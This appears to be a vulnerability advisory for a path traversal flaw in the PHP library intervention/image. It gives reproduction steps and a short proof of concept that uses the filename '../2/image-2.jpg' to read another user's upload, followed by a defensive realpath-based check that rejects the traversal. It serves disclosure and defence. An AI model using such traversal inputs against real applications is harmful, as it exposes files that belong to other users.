vulnerability relative path traversal
severity 6.1
language php
registry packagist


intervention/image is an image handling and manipulation library. This package is vulnerable to a Directory Traversal attack.


  1. Create a project dir in your htdocs folder
  2. Install the package using Composer.
  3. Create the folder structure below in your project root dir; this is where the images will be stored
-> first-folder
--> image-1.jpg
-> second-folder
--> image-2.jpg
  4. Create a test.php file in your project root dir, then copy and paste the code below

```php
<?php
require 'vendor/autoload.php';

// attacker-influenced filename: "../" climbs out of uploads/1/
$imageFilename = '../2/image-2.jpg';

// import the Intervention Image Manager Class
use Intervention\Image\ImageManagerStatic as Image;

// open an image file; the concatenated path is used without validation
$img = Image::make('uploads/1/'.$imageFilename);

// now you are able to resize the instance
$img->resize(320, 240);

// finally we save the image as a new file
$img->save('uploads/1/newphoto.jpeg');
```
  5. Open a terminal in your project root dir, then run the command php test.php
  6. Verify that uploads/1/newphoto.jpeg now exists and contains the image that belongs to uploads/2/image-2.jpeg
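
A caller-side check that rejects the traversal shown in the steps above, as an added example that is not part of the original report or of intervention/image. The helper name resolveInsideBase and the temporary directory layout are assumptions made for illustration; the sample files are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not part of intervention/image): resolve a
// caller-supplied filename and refuse anything outside $baseDir.
function resolveInsideBase(string $baseDir, string $userPath): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('Base directory does not exist');
    }
    // realpath() collapses "..", "." and symlinks; false means no such file.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        throw new RuntimeException('File not found');
    }
    // Compare with a trailing separator so "uploads/1" does not match "uploads/10".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Path escapes the base directory');
    }
    return $target;
}

// Constructed sample layout mirroring the report: uploads/1 and uploads/2.
$root = sys_get_temp_dir() . '/traversal-demo-' . bin2hex(random_bytes(4));
mkdir("$root/uploads/1", 0700, true);
mkdir("$root/uploads/2", 0700, true);
file_put_contents("$root/uploads/1/image-1.jpg", 'constructed sample');
file_put_contents("$root/uploads/2/image-2.jpg", 'constructed sample');

foreach (['image-1.jpg', '../2/image-2.jpg'] as $imageFilename) {
    try {
        $safe = resolveInsideBase("$root/uploads/1", $imageFilename);
        // Only a vetted path like $safe would be handed to Image::make().
        echo "allowed:  $imageFilename -> $safe\n";
    } catch (RuntimeException $e) {
        echo "rejected: $imageFilename ({$e->getMessage()})\n";
    }
}
```

The first filename resolves inside uploads/1 and is allowed; the second resolves to uploads/2 and is rejected before any image is opened.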